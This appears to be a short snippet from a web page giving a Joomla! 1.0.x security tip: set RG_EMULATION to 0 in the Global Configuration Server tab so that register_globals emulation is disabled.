Make sure the RG_EMULATION has a ZERO (0) instead of one (1). When it's installed out of the box, it is 1, meaning register_globals is set to on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION BUTTON | SERVER tab: Have you upgraded from an earlier version of Joomla!?Affects: Joomla! 1.0.13—1.0.14
Read more
  • 0
  • 0
  • 3411